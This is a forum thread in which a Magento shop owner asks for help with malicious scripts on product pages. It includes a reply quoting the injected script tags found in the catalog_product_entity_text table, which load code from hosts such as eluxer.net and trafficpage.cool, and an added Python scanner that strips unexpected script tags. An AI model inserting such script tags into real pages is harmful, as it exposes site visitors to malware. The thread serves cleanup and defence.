Malware attack

SOLVED

When I load any of my product pages, the sites below, like eluxer.net, loadsource.org, s3.amazonaws.com and trafficpage.cool, are being called, and they are clearly malware. How can I remove them?

I had some security flaws that were fixed, but still didn't identify the origin of this attack.

magento2_malware.PNG

1 ACCEPTED SOLUTION

Re: Malware attack

Hello @mathro,

You can get more detail about directory ownership in production mode here: https://devdocs.magento.com/guides/v2.0/config-guide/prod/prod_file-sys-perms.html

--
If you've found one of my answers useful, please give Kudos or Accept as Solution

2 REPLIES 2

Re: Malware attack

I identified that all the registers on the catalog_product_entity_text table had this script injected:

<script src=\"//s3.amazonaws.com/js-static/1cdd8fd283222f8300.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/optout/set/lat?jsonp=__twb_cb_699089770&amp;key=1cdd8fd283222f8300&amp;cv=1533297485&amp;t=1533297485170\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/optout/set/lt?jsonp=__twb_cb_795376469&amp;key=1cdd8fd283222f8300&amp;cv=1678&amp;t=1533297485174\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/addons/lnkr5.min.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51469x7389x&amp;r=1533297485200\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/addons/lnkr30_nt.min.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://eluxer.net/code?id=105&amp;subid=51469_7389_\" type=\"text/javascript\" xml=\"space\"></script>

I confess that I failed to keep all my directories safe, giving them stricter permissions, and this could potentially be the reason for this injection. Could anyone confirm or give any clues?

How can I avoid future JavaScript injections?
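
The check below is an added example, not code from the thread or from Magento: it scans (value_id, value) pairs exported from catalog_product_entity_text for script tags whose host is not on an allowlist and returns the cleaned text for each affected row. The allowlist entry, the sample rows and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this shop legitimately loads scripts from (placeholder value).
ALLOWED_HOSTS = {"www.example-store.test"}

# <script ... src="..."></script>, tolerating the backslash-escaped quotes and
# the literal \r\n separators visible in the value posted in the thread.
SCRIPT_RE = re.compile(
    r'<script\b[^>]*?\bsrc\s*=\s*\\?["\']([^"\'\\>]+)\\?["\'][^>]*>\s*</script>'
    r'(?:\\r\\n|\r?\n)?',
    re.IGNORECASE,
)

# Constructed sample rows (value_id, value); only the hosts come from the thread.
SAMPLE_ROWS = [
    (1, 'Soft cotton shirt.'
        '<script src=\\"//s3.amazonaws.com/js-static/x.js\\"></script>\\r\\n'
        '<script src=\\"http://eluxer.net/code?id=0\\"></script>'),
    (2, "<p>Plain description, nothing injected.</p>"),
    (3, '<script src="https://www.example-store.test/js/widget.js"></script>'),
]

def script_host(src):
    """Host of a script URL (handles //host/path); None for relative paths."""
    return (urlsplit(src).hostname or "").lower() or None

def scan_rows(rows, allowed=ALLOWED_HOSTS):
    """Yield (value_id, unexpected_hosts, cleaned_value) for each infected row."""
    for value_id, value in rows:
        bad = set()

        def strip(match):
            host = script_host(match.group(1))
            if host and host not in allowed:
                bad.add(host)      # record the off-site host
                return ""          # and drop the whole tag
            return match.group(0)  # keep local or allowlisted scripts

        cleaned = SCRIPT_RE.sub(strip, value or "")
        if bad:
            yield value_id, sorted(bad), cleaned

if __name__ == "__main__":
    for value_id, hosts, cleaned in scan_rows(SAMPLE_ROWS):
        print(value_id, hosts, repr(cleaned))
```

Run it over a database export first and review the flagged rows before writing any cleaned value back.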

 
